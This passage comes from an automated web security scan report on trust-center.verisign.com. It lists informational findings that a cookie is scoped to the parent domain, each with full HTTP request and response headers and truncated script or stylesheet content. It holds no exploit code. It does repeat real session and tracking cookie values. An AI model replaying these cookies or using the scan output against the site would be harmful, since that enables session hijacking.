Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 89269
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
   Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/

/*
   
...[SNIP]...

9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/syscheck.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1470
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}}
function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o
...[SNIP]...

9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 57905
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi
...[SNIP]...

9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 22968
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
* Copyright . 1999-2009 TeaLeaf Technology, Inc.
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS''

...[SNIP]...

9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4605
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi
...[SNIP]...

9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19769
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro
...[SNIP]...

9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/utility.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8013
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;}
if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)
...[SNIP]...

9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/brand.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7437
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

@import "vrsn.css";
#vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;}
#vrsn_standard_bar_footer{border-top:1px solid #EDEDEE
...[SNIP]...

9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/capture_payment.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2075
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*import from capture_payment.css - Coakley 10_5_2010 */
.radio_button {width:180px;}
.blurb {padding-left:5px;padding-bottom:10px;}
#tax_exemption_section {margin-left:35px;}
.content_line {    position
...[SNIP]...

9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/minimal_form.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3324
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#quick_signin_box {position:relative;top:0px;margin:0px;}
.minimal-form-gray, .minimal-form-gray * {background-color:gray;}
.minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t
...[SNIP]...

9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/module.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 698
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;}
#ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po
...[SNIP]...

9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/product_selector.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9496
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#comparison_chart_panel{position:absolute;right:20px;top:0;}
#product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;
...[SNIP]...

9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/vrsn.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
